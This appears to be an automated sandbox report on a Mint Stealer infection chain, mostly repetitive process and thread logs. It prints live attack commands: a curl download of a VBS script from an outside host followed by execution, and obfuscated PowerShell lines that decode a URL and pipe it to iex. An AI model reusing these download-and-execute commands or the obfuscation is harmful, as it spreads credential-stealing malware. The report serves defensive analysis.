          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6192Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3508Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5945Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3702Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5740Thread sleep count: 6192 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep count: 3508 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4428Thread sleep time: -9223372036854770s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6760Thread sleep count: 5945 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7036Thread sleep count: 3702 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452Thread sleep time: -13835058055282155s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914583621.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911387839.0000000002DC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910897341.0000000002DAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWlsy
          Source: wscript.exe, 00000007.00000003.1894609306.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: wscript.exe, 00000007.00000003.1894609306.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1901975042.00000000059A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895437106.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895276719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1900594503.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: mshta.exe, 00000000.00000002.1841794584.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838231650.0000000002B9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
          Source: mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdWndClassu
          Source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
          Source: curl.exe, 00000004.00000003.1811312291.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2059479627.000001596B16B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: wscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895437106.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895276719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1900594503.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 45.11.180.77 443
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbsJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.jsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\pmxdhq.js
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)Jump to behavior
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)Jump to behavior
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Mint Stealer
          Source: Yara matchFile source: 0000000F.00000002.1967997619.0000021C0FA47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3448, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Mint Stealer
          Source: Yara matchFile source: 0000000F.00000002.1967997619.0000021C0FA47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3448, type: MEMORYSTR

          Mitre Att&ck Matrix

